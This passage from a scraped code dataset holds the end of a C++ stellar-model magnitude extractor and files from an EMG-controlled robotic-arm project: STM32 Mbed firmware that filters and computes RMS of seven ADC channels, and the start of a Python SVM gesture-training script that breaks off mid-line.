\"EighthO_\"; //Prefix to input/output files that contain data for EighthO mode\r\n\tchar NinethO_FilePrefix[10] = \"NinethO_\"; //Prefix to input/output files that contain data for NinethO mode\r\n\t\r\n\tchar SetA_Suffix[10] = \"_SetA.dat\"; //Suffix to input/output file for SetA\r\n\tchar SetB_Suffix[10] = \"_SetB.dat\"; //Suffix to input/output file for SetB\r\n\tchar SetC_Suffix[10] = \"_SetC.dat\"; //Suffix to input/output file for SetC\r\n\tchar SetD_Suffix[10] = \"_SetD.dat\"; //Suffix to input/output file for SetD\r\n\t\r\n\t///////////////////////////////////////\r\n\t\r\n\t//Variables//\r\n\t\r\n\tconst int nArray = NumOfModels + 1;\r\n\t\r\n\tchar FU_FileName[100];\r\n\tchar FO_FileName[100];\r\n\tchar SO_FileName[100];\r\n\tchar ThirdO_FileName[100];\r\n\tchar ForthO_FileName[100];\r\n\tchar FifthO_FileName[100];\r\n\tchar SixthO_FileName[100];\r\n\tchar SeventhO_FileName[100];\r\n\tchar EighthO_FileName[100];\r\n\tchar NinethO_FileName[100];\r\n\t\r\n\tchar FU_HistoryFilePath[100];\r\n\tchar FO_HistoryFilePath[100];\r\n\tchar SO_HistoryFilePath[100];\r\n\tchar ThirdO_HistoryFilePath[100];\r\n\tchar ForthO_HistoryFilePath[100];\r\n\tchar FifthO_HistoryFilePath[100];\r\n\tchar SixthO_HistoryFilePath[100];\r\n\tchar SeventhO_HistoryFilePath[100];\r\n\tchar EighthO_HistoryFilePath[100];\r\n\tchar NinethO_HistoryFilePath[100];\r\n\t\r\n\tchar FU_FullOutputFileName[100];\r\n\tchar FO_FullOutputFileName[100];\r\n\tchar SO_FullOutputFileName[100];\r\n\tchar ThirdO_FullOutputFileName[100];\r\n\tchar ForthO_FullOutputFileName[100];\r\n\tchar FifthO_FullOutputFileName[100];\r\n\tchar SixthO_FullOutputFileName[100];\r\n\tchar SeventhO_FullOutputFileName[100];\r\n\tchar EighthO_FullOutputFileName[100];\r\n\tchar NinethO_FullOutputFileName[100];\r\n\t\r\n\tdouble Model[nArray];\r\n\tdouble z[nArray];\r\n\tdouble x[nArray];\r\n\tdouble M[nArray];\r\n\tdouble L[nArray];\r\n\tdouble T[nArray];\r\n\tdouble Lin_Period[nArray];\r\n\tdouble Growth_rate[nArray];\r\n\tdouble logT[nArray];\r\n\tdouble logP[nArray];\r\n\tdouble logM[nArray];\r\n\t\r\n\tdouble abs_mag_V[nArray];\r\n\tdouble abs_mag_I[nArray];\r\n\t\r\n\tint NumOfLines = 0;\r\n\t\r\n\tstring readout;\r\n\tstring input_header;\r\n\tstring Model_string;\r\n\t\r\n\tstring history_header1;\r\n\tstring history_header2;\r\n\tstring history_header3;\r\n\tstring history_header4;\r\n\tstring history_header5;\r\n\tstring history_header6;\r\n\t\r\n\tifstream inFileFU;\r\n\tifstream inFileFO;\r\n\tifstream inFileSO;\r\n\tifstream inFileThirdO;\r\n\tifstream inFileForthO;\r\n\tifstream inFileFifthO;\r\n\tifstream inFileSixthO;\r\n\tifstream inFileSeventhO;\r\n\tifstream inFileEighthO;\r\n\tifstream inFileNinethO;\r\n\t\r\n\tifstream inFileHistoryFU;\r\n\tifstream inFileHistoryFO;\r\n\tifstream inFileHistorySO;\r\n\tifstream inFileHistoryThirdO;\r\n\tifstream inFileHistoryForthO;\r\n\tifstream inFileHistoryFifthO;\r\n\tifstream inFileHistorySixthO;\r\n\tifstream inFileHistorySeventhO;\r\n\tifstream inFileHistoryEighthO;\r\n\tifstream inFileHistoryNinethO;\r\n\t\r\n\tofstream outFileCMD_FU;\r\n\tofstream outFileCMD_FO;\r\n\tofstream outFileCMD_SO;\r\n\tofstream outFileCMD_ThirdO;\r\n\tofstream outFileCMD_ForthO;\r\n\tofstream outFileCMD_FifthO;\r\n\tofstream outFileCMD_SixthO;\r\n\tofstream outFileCMD_SenventhO;\r\n\tofstream outFileCMD_EighthO;\r\n\tofstream outFileCMD_NinethO;\r\n\t\r\n\tdouble dummy1[nArray];\r\n\tdouble dummy2[nArray];\r\n\tdouble dummy3[nArray];\r\n\tdouble dummy4[nArray];\r\n\tdouble dummy5[nArray];\r\n\tdouble dummy6[nArray];\r\n\tdouble dummy7[nArray];\r\n\tdouble dummy8[nArray];\r\n\tdouble dummy9[nArray];\r\n\tdouble dummy10[nArray];\r\n\tdouble dummy11[nArray];\r\n\tdouble dummy12[nArray];\r\n\tdouble dummy13[nArray];\r\n\tdouble dummy14[nArray];\r\n\tdouble dummy15[nArray];\r\n\tdouble dummy16[nArray];\r\n\tdouble dummy17[nArray];\r\n\tdouble dummy18[nArray];\r\n\tdouble dummy19[nArray];\r\n\tdouble dummy20[nArray];\r\n\tdouble dummy21[nArray];\r\n\tdouble dummy22[nArray];\r\n\tdouble dummy23[nArray];\r\n\tdouble dummy24[nArray];\r\n\tdouble dummy25[nArray];\r\n\tdouble dummy26[nArray];\r\n\tdouble dummy27[nArray];\r\n\tdouble dummy28[nArray];\r\n\tdouble dummy29[nArray];\r\n\tdouble dummy30[nArray];\r\n\tdouble dummy31[nArray];\r\n\tdouble dummy32[nArray];\r\n\tdouble dummy33[nArray];\r\n\tdouble dummy34[nArray];\r\n\tdouble dummy35[nArray];\r\n\tdouble dummy36[nArray];\r\n\tdouble dummy37[nArray];\r\n\tdouble dummy38[nArray];\r\n\tdouble dummy39[nArray];\r\n\tdouble dummy40[nArray];\r\n\t\r\n\t\r\n\t//////////////////////////////////////\r\n\t\r\n\t\r\n\t//Main loop for FU mode//\r\n\tfor(int i = 0; i < NumOfSets; i++){\r\n\t\t\r\n\t\t//SetA\r\n\t\tif(i == 0){\r\n\t\t\t\r\n\t\t\t//Put together input file name\r\n\t\t\tstrcpy(FU_FileName, FU_FilePrefix);\r\n\t\t\tstrcat(FU_FileName, inputFileName_ForPositiveGrowthModels);\r\n\t\t\tstrcat(FU_FileName, SetA_Suffix);\r\n\t\t\t\r\n\t\t\tinFileFU.open(FU_FileName, ios::in);\r\n\t\t\t\r\n\t\t\t//Getting number of lines in file\r\n\t\t\twhile(getline(inFileFU, readout)){\r\n\t\t\t\tNumOfLines = NumOfLines + 1;\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\tcout<<\"Number of Lines in FU SetA file: \"<<NumOfLines<<endl;\r\n\t\t\t\r\n\t\t\tinFileFU.close();\r\n\t\t\t\r\n\t\t\tinFileFU.open(FU_FileName, ios::in);\r\n\t\t\tgetline(inFileFU, input_header);\r\n\t\t\t\r\n\t\t\t//Main loop that fills arrays\r\n\t\t\tfor(int j = 1; j < NumOfLines; j++){\r\n\t\t\t\t\r\n\t\t\t\tinFileFU>>Model[j]>>z[j]>>x[j]>>M[j]>>L[j]>>T[j]>>Lin_Period[j]>>Growth_rate[j]>>logT[j]>>logP[j]>>logM[j];\r\n\t\t\t\t\r\n\t\t\t\t//cout<<setw(5)<<Model[j]<<setw(20)<<z[j]<<setw(20)<<x[j]<<setw(20)<<M[j]<<setw(20)<<L[j]<<setw(20)<<T[j]<<setw(20)<<Lin_Period[j]<<setw(20)<<Growth_rate[j]<<setw(20)<<logT[j]<<setw(20)<<logP[j]<<setw(20)<<logM[j]<<endl;\r\n\t\t\t\t\r\n\t\t\t\t//Getting model number into string, and then into char\r\n\t\t\t\tstringstream stream;\r\n\t\t\t\t\tstream<<Model[j];\r\n\t\t\t\t\tconst char* Model_char = stream.str().c_str();\t\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t///Get history file and then input into arrays///\r\n\t\t\t\tstrcpy(FU_HistoryFilePath, log_directory_prefix);\r\n\t\t\t\tstrcat(FU_HistoryFilePath, Model_char);\r\n\t\t\t\tstrcat(FU_HistoryFilePath, \"/\");\r\n\t\t\t\tstrcat(FU_HistoryFilePath, HistoryFileName);\r\n\t\t\t\tcout<<\"FU History file path: \"<<FU_HistoryFilePath<<endl;\r\n\t\t\t\t\r\n\t\t\t\tinFileHistoryFU.open(FU_HistoryFilePath, ios::in);\r\n\t\t\t\t//Get headers out of the way\r\n\t\t\t\tgetline(inFileHistoryFU, history_header1);\r\n\t\t\t\tgetline(inFileHistoryFU, history_header2);\r\n\t\t\t\tgetline(inFileHistoryFU, history_header3);\r\n\t\t\t\tgetline(inFileHistoryFU, history_header4);\r\n\t\t\t\tgetline(inFileHistoryFU, history_header5);\r\n\t\t\t\tgetline(inFileHistoryFU, history_header6);\r\n\t\t\t\r\n\t\t\t\tinFileHistoryFU>>dummy1[j]>>dummy2[j]>>dummy3[j]>>dummy4[j]>>dummy5[j]>>dummy6[j]>>dummy7[j]>>dummy8[j]>>dummy9[j]>>dummy10[j]>>dummy11[j]>>dummy12[j]>>dummy13[j]>>dummy14[j]>>dummy15[j]>>dummy16[j]>>dummy17[j]>>dummy18[j]>>dummy19[j]>>dummy20[j]>>dummy21[j]>>dummy22[j]>>dummy23[j]>>dummy24[j]>>dummy25[j]>>dummy26[j]>>dummy27[j]>>dummy28[j]>>dummy29[j]>>dummy30[j]>>dummy31[j]>>dummy32[j]>>dummy33[j]>>dummy34[j]>>dummy35[j]>>dummy36[j]>>dummy37[j]>>abs_mag_V[j]>>abs_mag_I[j]>>dummy40[j]; \r\n\t\t\t\t//cout<<setw(5)<<dummy1[j]<<setw(10)<<dummy2[j]<<setw(10)<<dummy3[j]<<setw(10)<<dummy4[j]<<setw(10)<<dummy5[j]<<setw(10)<<dummy6[j]<<setw(10)<<dummy7[j]<<setw(10)<<dummy8[j]<<setw(10)<<dummy9[j]<<setw(10)<<dummy10[j]<<setw(10)<<dummy11[j]<<setw(10)<<dummy12[j]<<setw(10)<<dummy13[j]<<setw(10)<<dummy14[j]<<setw(10)<<dummy15[j]<<setw(10)<<dummy16[j]<<setw(10)<<dummy17[j]<<setw(10)<<dummy18[j]<<setw(10)<<dummy19[j]<<setw(10)<<dummy20[j]<<setw(10)<<dummy21[j]<<setw(10)<<dummy22[j]<<setw(10)<<dummy23[j]<<setw(10)<<dummy24[j]<<setw(10)<<dummy25[j]<<setw(10)<<dummy26[j]<<setw(10)<<dummy27[j]<<setw(10)<<dummy28[j]<<setw(10)<<dummy29[j]<<setw(10)<<dummy30[j]<<setw(10)<<dummy31[j]<<setw(10)<<dummy32[j]<<setw(10)<<dummy33[j]<<setw(10)<<dummy34[j]<<setw(10)<<dummy35[j]<<setw(10)<<dummy36[j]<<setw(10)<<dummy37[j]<<setw(10)<<abs_mag_V[j]<<setw(10)<<abs_mag_I[j]<<setw(10)<<dummy40[j]; \r\n\r\n\t\t\t\tinFileHistoryFU.close();\r\n\t\t\t\t//cout<<\"abs_mag_V: \"<<abs_mag_V[j]<<endl;\r\n\t\t\t\t//cout<<\"abs_mag_I: \"<<abs_mag_I[j]<<endl;\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t//Make outputfile name \r\n\t\t\tstrcpy(FU_FullOutputFileName, FU_FilePrefix);\r\n\t\t\tstrcat(FU_FullOutputFileName, outputFileName);\r\n\t\t\tstrcat(FU_FullOutputFileName, SetA_Suffix);\r\n\t\t\t\r\n\t\t\toutFileCMD_FU.open(FU_FullOutputFileName, ios::out);\r\n\t\t\toutFileCMD_FU<<setw(5)<<\"Model\"<<setw(34)<<\"abs_mag_V\"<<setw(40)<<\"abs_mag_I\"<<setw(46)<<\"abs_mag_V - abs_mag_I\"<<endl; //Header\r\n\t\t\t\r\n\t\t\tfor(int j = 1; j < NumOfLines; j++){\r\n\t\t\t\r\n\t\t\t\toutFileCMD_FU<<setprecision(17)<<setw(5)<<Model[j]<<setw(40)<<abs_mag_V[j]<<setw(40)<<abs_mag_I[j]<<setw(40)<<(abs_mag_V[j] - abs_mag_I[j])<<endl; //Note that 17 is the precision of a history file. This will output all numbers\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\toutFileCMD_FU.close();\r\n\t\t\r\n\t\t}\r\n\t\t\r\n\t\t//SetB\r\n\t\tif(i == 0){\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t}\r\n\t\t\r\n\t\t//SetC\r\n\t\tif(i == 0){\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t}\r\n\t\t\r\n\t\t//SetD\r\n\t\tif(i == 0){\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t}\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t}\r\n\t\r\n\treturn 0;\r\n}" } ]
3
Kostas-Stratakis/EMG-Control-of-Robotic-Arm
https://github.com/Kostas-Stratakis/EMG-Control-of-Robotic-Arm
ca69a6c39ec8dd080cc4f3f7c0b200029d10d223
8c7bae95feef61b29e9fcdb5a19289da650cfd28
7bc416c76dcbe9ce2da3c2389fe5b37fbf44a5ed
refs/heads/master
2020-07-06T01:56:22.410361
2019-08-18T10:58:38
2019-08-18T10:58:38
202,853,057
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.47481420636177063, "alphanum_fraction": 0.5582163333892822, "avg_line_length": 30.560537338256836, "blob_id": "a2f6543a13da69f73ea28a2908fa0d6cc7fdccd5", "content_id": "01bb8c0e61d2f18cbfabe8a9aa68ed42647ad206", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7269, "license_type": "permissive", "max_line_length": 211, "num_lines": 223, "path": "/Microprocessor Software.cpp", "repo_name": "Kostas-Stratakis/EMG-Control-of-Robotic-Arm", "src_encoding": "UTF-8", "text": "//This Software was designed with Mbed platform for a Nucleo board of STM32 in C++.\r\n// The microprocessor samples 7 seven channels of the ADC at 2048 Hz and filters the signal from DC and 50Hz compoents.\r\n//The the RMS of each channel is computed over window of 128 samples and a vector is sent to a PC.\r\n// Due to analog circuit restrictions only 4 of the 7 computed values are sent via Uart mounted with Bluetooth to PC.\r\n// The vectors sent are stored in files so that datasets are created for the traing of the pattern recogniition algorithm.\r\n//The patern recognition done by an SVM takes place at a PC.\r\n\r\n\r\n#include \"mbed.h\"\r\n\r\n#define pi 3.14159265358979323846\r\n\r\nInterruptIn button(USER_BUTTON);\r\nDigitalOut led(LED1);\r\nSerial blu (PC_4, PA_10);\r\nTicker timer; // declaration of interruppt \r\n\r\n//from which pins to sample. the last one is for the refference electrode\r\nAnalogIn in1(PA_0);\r\nAnalogIn in2(PA_1);\r\nAnalogIn in3(PA_4);\r\nAnalogIn in4(PB_0);\r\nAnalogIn in5(PC_1);\r\nAnalogIn in6(PC_0);\r\nAnalogIn in7(PC_2);\r\n\r\n\r\n\r\n//declaration of buffers for the notch filter for seven channels\r\nfloat xnbuffer1[2]={0},xnbuffer2[2]={0},xnbuffer3[2]={0},xnbuffer4[2]={0},xnbuffer5[2]={0},xnbuffer6[2]={0},xnbuffer7[2]={0}; // here the previous values of analog in will be stored for each channel\r\nfloat ynbuffer1[2]={0},ynbuffer2[2]={0},ynbuffer3[2]={0},ynbuffer4[2]={0},ynbuffer5[2]={0},ynbuffer6[2]={0},ynbuffer7[2]={0};// here the previous values of the notch filter output will be stored for each channel\r\n\r\n//daclaration of variables to store the adc values from analog in \r\nfloat xn1=0,xn2=0,xn3=0,xn4=0,xn5=0,xn6=0,xn7=0;\r\n//x[n-1] buffer, x[n]buffer\r\nfloat xn1prev=0,xn2prev=0,xn3prev=0,xn4prev=0;\r\nfloat xn1now=0,xn2now=0,xn3now=0,xn4now=0;\r\n//declaration of the filter output variables for each channel\r\nfloat yn1=0,yn2=0,yn3=0,yn4=0,yn5=0,yn6=0,yn7=0;\r\n\r\n//declaration of window buffers after the notch. Here 128 consecutive values from them notch filter for each channel will be stored\r\nfloat chan1[128]={0};\r\nfloat chan2[128]={0};\r\nfloat chan3[128]={0};\r\nfloat chan4[128]={0};\r\nfloat chan5[128]={0};\r\nfloat chan6[128]={0};\r\nfloat chan7[128]={0};\r\n\r\n// declaration of feature vector to send\r\nfloat x[7]={0}; \r\n\r\n//declaration of variable that is changed in the timer function and in button interrupt\r\nint interval=0;\r\nbool btn=0;\r\n\r\nvoid button_press(){\r\n btn=!btn;\r\n}\r\n\r\nvoid timer_interrupt() {\r\n interval=1;\r\n}\r\n\r\nint main() {\r\nblu.baud(9600); // with 9600 baud it loses samples if sending just the xn values\r\n\r\n//declaration of main variables\r\nint i=0; // 128 values buffer index\r\nint j; //counter for rms for\r\n\r\n// declaration of the 50Hz filter coefficients\r\nfloat a1,a2,b1,r=0.99,w0=(50.0/1048.0)*pi;\r\n\r\n//computing the coefficients\r\na1=2*r*cos(w0);\r\na2=r*r;\r\nb1=2*cos(w0);\r\n\r\n // enabling the interrupts\r\ntimer.attach(&timer_interrupt, 1.0/2048.0);\r\nbutton.fall(&button_press);\r\n\r\n\r\nwhile (true) {\r\n \r\nif(interval==1){\r\nif(btn==1){\r\n \r\n //transfering values from analog in objects in* to variables xn removing dc. Mbed analog in returns values in [0,1]\r\n //implementaion of DC filter x[n]-x[n-1]\r\n \r\n xn1now=(in1*3.6f);\r\n xn2now=(in2*3.6f);\r\n xn3now=(in3*3.6f);\r\n xn4now=(in4*3.6f);\r\n \r\n //xn1,2,3,4 is the output fo the DC filter\r\n xn1=xn1now-xn1prev;\r\n xn2=xn2now-xn2prev;\r\n xn3=xn3now-xn3prev;\r\n xn4=xn4now-xn4prev;\r\n xn5=(in5*3.6f);\r\n xn6=(in6*3.6f);\r\n xn7=(in7*3.6f);\r\n \r\n //filtering the 7 channels with the notch\r\n yn1=a1*ynbuffer1[1]-a2*ynbuffer1[0]+xn1-b1*xnbuffer1[1]+xnbuffer1[0]; \r\n yn2=a1*ynbuffer2[1]-a2*ynbuffer2[0]+xn2-b1*xnbuffer2[1]+xnbuffer2[0]; \r\n yn3=a1*ynbuffer3[1]-a2*ynbuffer3[0]+xn3-b1*xnbuffer3[1]+xnbuffer3[0];\r\n yn4=a1*ynbuffer4[1]-a2*ynbuffer4[0]+xn4-b1*xnbuffer4[1]+xnbuffer4[0];\r\n yn5=a1*ynbuffer5[1]-a2*ynbuffer5[0]+xn5-b1*xnbuffer5[1]+xnbuffer5[0];\r\n yn6=a1*ynbuffer6[1]-a2*ynbuffer6[0]+xn6-b1*xnbuffer6[1]+xnbuffer6[0];\r\n yn7=a1*ynbuffer7[1]-a2*ynbuffer7[0]+xn7-b1*xnbuffer7[1]+xnbuffer7[0];\r\n \r\n \r\n \r\n // sending the output of filter\r\n //blu.printf(\"%0.5f\\r\\n\",yn1);\r\n \r\n //changing the values in the buffers for the next samples computation\r\n //1st channel\r\n ynbuffer1[0]=ynbuffer1[1];\r\n ynbuffer1[1]=yn1;\r\n xnbuffer1[0]=xnbuffer1[1];\r\n xnbuffer1[1]=xn1;\r\n //2nd channel\r\n ynbuffer2[0]=ynbuffer2[1];\r\n ynbuffer2[1]=yn2;\r\n xnbuffer2[0]=xnbuffer2[1];\r\n xnbuffer2[1]=xn2;\r\n //3rd channel\r\n ynbuffer3[0]=ynbuffer3[1];\r\n ynbuffer3[1]=yn3;\r\n xnbuffer3[0]=xnbuffer3[1];\r\n xnbuffer3[1]=xn3;\r\n //4th channel\r\n ynbuffer4[0]=ynbuffer4[1];\r\n ynbuffer4[1]=yn4;\r\n xnbuffer4[0]=xnbuffer4[1];\r\n xnbuffer4[1]=xn4;\r\n //5th channel\r\n ynbuffer5[0]=ynbuffer5[1];\r\n ynbuffer5[1]=yn5;\r\n xnbuffer5[0]=xnbuffer5[1];\r\n xnbuffer5[1]=xn5;\r\n //6th channel\r\n ynbuffer6[0]=ynbuffer6[1];\r\n ynbuffer6[1]=yn6;\r\n xnbuffer6[0]=xnbuffer6[1];\r\n xnbuffer6[1]=xn6;\r\n //7th channel\r\n ynbuffer7[0]=ynbuffer7[1];\r\n ynbuffer7[1]=yn7;\r\n xnbuffer7[0]=xnbuffer7[1];\r\n xnbuffer7[1]=xn7;\r\n \r\n //changing values for the x[n-1] buffer\r\n xn1prev=xn1now;\r\n xn2prev=xn2now;\r\n xn3prev=xn3now;\r\n xn4prev=xn4now;\r\n \r\n \r\n // amassing the outputs of the 7 notches to the corresponding 128-values buffers \r\n if(i<128){\r\n chan1[i]=pow(yn1,2);\r\n chan2[i]=pow(yn2,2);\r\n chan3[i]=pow(yn3,2);\r\n chan4[i]=pow(yn4,2);\r\n chan5[i]=pow(yn5,2);\r\n chan6[i]=pow(yn6,2);\r\n chan7[i]=pow(yn7,2);\r\n i++;\r\n } \r\n \r\n if(i==128){\r\n // rms computation \r\n // with this for Σxi^2 is computed for each channel \r\n for(j=0;j<128;j++){\r\n x[0]=x[0]+chan1[j];\r\n x[1]=x[1]+chan2[j];\r\n x[2]=x[2]+chan3[j];\r\n x[3]=x[3]+chan4[j];\r\n x[4]=x[4]+chan5[j];\r\n x[5]=x[5]+chan6[j];\r\n x[6]=x[6]+chan7[j];\r\n }\r\n // na mhn ksexasw na mhdenisw to x sto telos \r\n x[0]=sqrt(x[0]/128.0f);\r\n x[1]=sqrt(x[1]/128.0f);\r\n x[2]=sqrt(x[2]/128.0f);\r\n x[3]=sqrt(x[3]/128.0f);\r\n x[4]=sqrt(x[4]/128.0f);\r\n x[5]=sqrt(x[5]/128.0f);\r\n x[6]=sqrt(x[6]/128.0f); \r\n \r\n blu.printf(\"%0.5f,%0.5f,%0.5f,%0.5f \\r\\n\\0\",x[0],x[1],x[2],x[3]);\r\n \r\n // re initialize x vector to zero \r\n for(j=0;j<7;j++){\r\n x[j]=0; }//for j end \r\n \r\n i=0;\r\n \r\n } // if i==128 end \r\n }// if btn==1 end \r\n \r\n interval=0; \r\n \r\n }// if interval ==1 end\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n }// while true end\r\n}// main end\r\n \r\n" }, { "alpha_fraction": 0.5710580945014954, "alphanum_fraction": 0.6516251564025879, "avg_line_length": 40.485294342041016, "blob_id": "6dcf061acf9fa0da333aecef82d7b1fe8bb3fc65", "content_id": "6f611be2edcdf3fab2e3e8e2d4a0145dd4e96692", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11568, "license_type": "permissive", "max_line_length": 188, "num_lines": 272, "path": "/Finding_best_SVM_for_5gestures.py", "repo_name": "Kostas-Stratakis/EMG-Control-of-Robotic-Arm", "src_encoding": "UTF-8", "text": "#This code trains consequently SVMs with different parameters C and gamma to find the one with the best recognition scores for 5 gestures.\r\n#The datasets are retrieved from the local drive where they were stored at a previous step. (look at Microprcessor Software).\r\n#The parameters and the kernel with the best recall score should be noted so that they can be given to another Python code which trains an SVM and sends commads to the Lego NXT Robot.\r\n\r\n\r\nimport numpy as np\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import cross_val_score\r\nnp.set_printoptions(threshold=sys.maxsize)\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.svm import SVC\r\nfrom sklearn import preprocessing\r\n\r\n# session 1 loading data to variables lists\r\ns1g0=\"C:/Users/ece73/Desktop/recordings/session1/gesture0.txt\"\r\ns1g1=\"C:/Users/ece73/Desktop/recordings/session1/gesture1.txt\"\r\ns1g2=\"C:/Users/ece73/Desktop/recordings/session1/gesture2.txt\"\r\ns1g3=\"C:/Users/ece73/Desktop/recordings/session1/gesture3.txt\"\r\ns1g4=\"C:/Users/ece73/Desktop/recordings/session1/gesture4.txt\"\r\ns1g5=\"C:/Users/ece73/Desktop/recordings/session1/gesture5.txt\"\r\ns1g6=\"C:/Users/ece73/Desktop/recordings/session1/gesture6.txt\"\r\ns1g7=\"C:/Users/ece73/Desktop/recordings/session1/gesture7.txt\"\r\ns1g8=\"C:/Users/ece73/Desktop/recordings/session1/gesture8.txt\"\r\n\r\nds1g0 = np.loadtxt(s1g0, delimiter=\",\")\r\nds1g1 = np.loadtxt(s1g1, delimiter=\",\")\r\nds1g2 = np.loadtxt(s1g2, delimiter=\",\")\r\nds1g3 = np.loadtxt(s1g3, delimiter=\",\")\r\nds1g4 = np.loadtxt(s1g4, delimiter=\",\")\r\nds1g5 = np.loadtxt(s1g5, delimiter=\",\")\r\nds1g6 = np.loadtxt(s1g6, delimiter=\",\")\r\nds1g7 = np.loadtxt(s1g7, delimiter=\",\")\r\nds1g8 = np.loadtxt(s1g8, delimiter=\",\")\r\n###################################################\r\n\r\n# session 2 loading data to variables lists\r\ns2g0=\"C:/Users/ece73/Desktop/recordings/session2/gesture0.txt\"\r\ns2g1=\"C:/Users/ece73/Desktop/recordings/session2/gesture1.txt\"\r\ns2g2=\"C:/Users/ece73/Desktop/recordings/session2/gesture2.txt\"\r\ns2g3=\"C:/Users/ece73/Desktop/recordings/session2/gesture3.txt\"\r\ns2g4=\"C:/Users/ece73/Desktop/recordings/session2/gesture4.txt\"\r\ns2g5=\"C:/Users/ece73/Desktop/recordings/session2/gesture5.txt\"\r\ns2g6=\"C:/Users/ece73/Desktop/recordings/session2/gesture6.txt\"\r\ns2g7=\"C:/Users/ece73/Desktop/recordings/session2/gesture7.txt\"\r\ns2g8=\"C:/Users/ece73/Desktop/recordings/session2/gesture8.txt\"\r\n\r\nds2g0 = np.loadtxt(s2g0, delimiter=\",\")\r\nds2g1 = np.loadtxt(s2g1, delimiter=\",\")\r\nds2g2 = np.loadtxt(s2g2, delimiter=\",\")\r\nds2g3 = np.loadtxt(s2g3, delimiter=\",\")\r\nds2g4 = np.loadtxt(s2g4, delimiter=\",\")\r\nds2g5 = np.loadtxt(s2g5, delimiter=\",\")\r\nds2g6 = np.loadtxt(s2g6, delimiter=\",\")\r\nds2g7 = np.loadtxt(s2g7, delimiter=\",\")\r\nds2g8 = np.loadtxt(s2g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# session 3 loading data to variables lists\r\ns3g0=\"C:/Users/ece73/Desktop/recordings/session3/gesture0.txt\"\r\ns3g1=\"C:/Users/ece73/Desktop/recordings/session3/gesture1.txt\"\r\ns3g2=\"C:/Users/ece73/Desktop/recordings/session3/gesture2.txt\"\r\ns3g3=\"C:/Users/ece73/Desktop/recordings/session3/gesture3.txt\"\r\ns3g4=\"C:/Users/ece73/Desktop/recordings/session3/gesture4.txt\"\r\ns3g5=\"C:/Users/ece73/Desktop/recordings/session3/gesture5.txt\"\r\ns3g6=\"C:/Users/ece73/Desktop/recordings/session3/gesture6.txt\"\r\ns3g7=\"C:/Users/ece73/Desktop/recordings/session3/gesture7.txt\"\r\ns3g8=\"C:/Users/ece73/Desktop/recordings/session3/gesture8.txt\"\r\n\r\nds3g0 = np.loadtxt(s3g0, delimiter=\",\")\r\nds3g1 = np.loadtxt(s3g1, delimiter=\",\")\r\nds3g2 = np.loadtxt(s3g2, delimiter=\",\")\r\nds3g3 = np.loadtxt(s3g3, delimiter=\",\")\r\nds3g4 = np.loadtxt(s3g4, delimiter=\",\")\r\nds3g5 = np.loadtxt(s3g5, delimiter=\",\")\r\nds3g6 = np.loadtxt(s3g6, delimiter=\",\")\r\nds3g7 = np.loadtxt(s3g7, delimiter=\",\")\r\nds3g8 = np.loadtxt(s3g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# session 4 loading data to variables lists\r\ns4g0=\"C:/Users/ece73/Desktop/recordings/session4/gesture0.txt\"\r\ns4g1=\"C:/Users/ece73/Desktop/recordings/session4/gesture1.txt\"\r\ns4g2=\"C:/Users/ece73/Desktop/recordings/session4/gesture2.txt\"\r\ns4g3=\"C:/Users/ece73/Desktop/recordings/session4/gesture3.txt\"\r\ns4g4=\"C:/Users/ece73/Desktop/recordings/session4/gesture4.txt\"\r\ns4g5=\"C:/Users/ece73/Desktop/recordings/session4/gesture5.txt\"\r\ns4g6=\"C:/Users/ece73/Desktop/recordings/session4/gesture6.txt\"\r\ns4g7=\"C:/Users/ece73/Desktop/recordings/session4/gesture7.txt\"\r\ns4g8=\"C:/Users/ece73/Desktop/recordings/session4/gesture8.txt\"\r\n\r\nds4g0 = np.loadtxt(s4g0, delimiter=\",\")\r\nds4g1 = np.loadtxt(s4g1, delimiter=\",\")\r\nds4g2 = np.loadtxt(s4g2, delimiter=\",\")\r\nds4g3 = np.loadtxt(s4g3, delimiter=\",\")\r\nds4g4 = np.loadtxt(s4g4, delimiter=\",\")\r\nds4g5 = np.loadtxt(s4g5, delimiter=\",\")\r\nds4g6 = np.loadtxt(s4g6, delimiter=\",\")\r\nds4g7 = np.loadtxt(s4g7, delimiter=\",\")\r\nds4g8 = np.loadtxt(s4g8, delimiter=\",\")\r\n##################################################################\r\n\r\n# session 5 loading data to variables lists\r\ns5g0=\"C:/Users/ece73/Desktop/recordings/session5/gesture0.txt\"\r\ns5g1=\"C:/Users/ece73/Desktop/recordings/session5/gesture1.txt\"\r\ns5g2=\"C:/Users/ece73/Desktop/recordings/session5/gesture2.txt\"\r\ns5g3=\"C:/Users/ece73/Desktop/recordings/session5/gesture3.txt\"\r\ns5g4=\"C:/Users/ece73/Desktop/recordings/session5/gesture4.txt\"\r\ns5g5=\"C:/Users/ece73/Desktop/recordings/session5/gesture5.txt\"\r\ns5g6=\"C:/Users/ece73/Desktop/recordings/session5/gesture6.txt\"\r\ns5g7=\"C:/Users/ece73/Desktop/recordings/session5/gesture7.txt\"\r\ns5g8=\"C:/Users/ece73/Desktop/recordings/session5/gesture8.txt\"\r\n\r\nds5g0 = np.loadtxt(s5g0, delimiter=\",\")\r\nds5g1 = np.loadtxt(s5g1, delimiter=\",\")\r\nds5g2 = np.loadtxt(s5g2, delimiter=\",\")\r\nds5g3 = np.loadtxt(s5g3, delimiter=\",\")\r\nds5g4 = np.loadtxt(s5g4, delimiter=\",\")\r\nds5g5 = np.loadtxt(s5g5, delimiter=\",\")\r\nds5g6 = np.loadtxt(s5g6, delimiter=\",\")\r\nds5g7 = np.loadtxt(s5g7, 